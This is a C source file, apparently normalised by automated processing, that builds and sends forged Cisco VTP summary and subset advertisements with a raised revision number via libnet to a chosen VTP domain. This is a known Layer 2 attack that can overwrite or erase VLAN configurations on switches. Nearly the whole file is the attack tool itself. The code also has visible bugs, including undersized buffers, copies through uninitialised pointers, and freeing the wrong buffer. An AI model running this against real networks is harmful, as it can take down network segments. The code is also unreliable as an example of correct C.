
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int u_int8_t ;
typedef int u_int32_t ;
struct vtp_summary {int version; int code; int followers; int dom_len; int* domain; void* revision; } ;
struct vtp_subset {int version; int code; int seq; int dom_len; int* domain; void* revision; } ;
struct libnet_ether_addr {int ether_addr_octet; } ;
typedef int libnet_t ;
typedef int libnet_ptag_t ;
typedef int cisco_data ;


 scalar_t__ LIBNET_802_2_H ;
 int LIBNET_ERRBUF_SIZE ;
 int LIBNET_LINK ;
 int* calloc (int,int) ;
 int exit (int) ;
 int fprintf (int ,char*,char*) ;
 int free (int*) ;
 int getopt (int,char**,char*) ;
 void* htonl (int) ;
 int libnet_build_802_2 (int,int,int,int*,int,int *,int ) ;
 int libnet_build_802_3 (int*,int ,scalar_t__,int *,int ,int *,int ) ;
 int libnet_clear_packet (int *) ;
 struct libnet_ether_addr* libnet_get_hwaddr (int *) ;
 int * libnet_init (int ,char*,char*) ;
 int libnet_write (int *) ;
 char* malloc (int) ;
 int memcpy (int*,...) ;
 int printf (char*,char*) ;
 int stderr ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int usage (char*) ;

int main( int argc, char *argv[] )
{
    int opt,k=0;
    extern char *optarg;
    libnet_ptag_t t;
    libnet_t *lhandler;
    u_int32_t vtp_len=0, sent;
    struct vtp_summary *vtp_summ;
    struct vtp_subset *vtp_sub;
    u_int8_t *vtp_packet,*vtp_packet2, *aux;
    u_int8_t cisco_data[]={ 0x00, 0x00, 0x0c, 0x20, 0x03 };
    u_int8_t dst_mac[6]={ 0x01,0x00,0x0c,0xcc,0xcc,0xcc };
    u_int8_t aaa[8]={ 0x22,0x00,0x11,0x22,0x11,0x00, 0x00,0x00 };
    struct libnet_ether_addr *mymac;
    char *device;
    char error_information[LIBNET_ERRBUF_SIZE];
    char *domain;


     while ((opt = getopt(argc, argv, "i:d:")) != -1)
     {
          switch (opt) {
          case 'i':
          device=malloc(strlen(optarg));
          strcpy(device,optarg);
      k=1;
          break;

          case 'd':
          domain=malloc(strlen(optarg));
          strcpy(domain,optarg);
          break;

          default: usage(argv[0]);
          }
     }
     if(!k) { printf("  %s -i <interface> -d <vtp domain>\n     must assign the interface\n",argv[0]);exit(1);}



    lhandler=libnet_init(LIBNET_LINK,device,error_information);
    if (!lhandler) {
             fprintf(stderr, "libnet_init: %s\n", error_information);
             return -1;
     }

    mymac=libnet_get_hwaddr(lhandler);

    vtp_len = sizeof(cisco_data)+sizeof(struct vtp_summary);
    vtp_packet = calloc(1,vtp_len);
    aux = vtp_packet;
    memcpy(vtp_packet,cisco_data,sizeof(cisco_data));
    aux+=sizeof(cisco_data);
    vtp_summ = (struct vtp_summary *)aux;
    vtp_summ->version = 0x01;
    vtp_summ->code = 0x01;
    vtp_summ->followers = 0x01;
    vtp_summ->dom_len = strlen(domain);
    memcpy(vtp_summ->domain,domain,strlen(domain));
    vtp_summ->revision = htonl(2000);
    t = libnet_build_802_2(
        0xaa,
        0xaa,
        0x03,
        vtp_packet,
        vtp_len,
        lhandler,
        0);
    t = libnet_build_802_3(
        dst_mac,
        mymac->ether_addr_octet,
        LIBNET_802_2_H + vtp_len,
        ((void*)0),
        0,
        lhandler,
        0);

     sent = libnet_write(lhandler);

     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);


     vtp_len = sizeof(cisco_data)+sizeof(struct vtp_subset);
     vtp_packet2 = calloc(1,vtp_len);
     aux = vtp_packet2;
     memcpy(vtp_packet2,cisco_data,sizeof(cisco_data));
     aux+=sizeof(cisco_data);

     vtp_sub = (struct vtp_subset *)aux;
     vtp_sub->version = 0x01;
     vtp_sub->code = 0x02;
     vtp_sub->seq = 0x01;
     vtp_sub->dom_len = strlen(domain);
     memcpy(vtp_sub->domain,domain,strlen(domain));
     vtp_sub->revision = htonl(2000);


    t = libnet_build_802_2(
        0xaa,
        0xaa,
        0x03,
        vtp_packet2,
        vtp_len,
        lhandler,
        0);
    t = libnet_build_802_3(
        dst_mac,
        mymac->ether_addr_octet,
        LIBNET_802_2_H + vtp_len,
        ((void*)0),
        0,
        lhandler,
        0);

     sent = libnet_write(lhandler);
     if (sent == -1) {
        libnet_clear_packet(lhandler);
        free(vtp_packet);
        return -1;
     }
     libnet_clear_packet(lhandler);
}
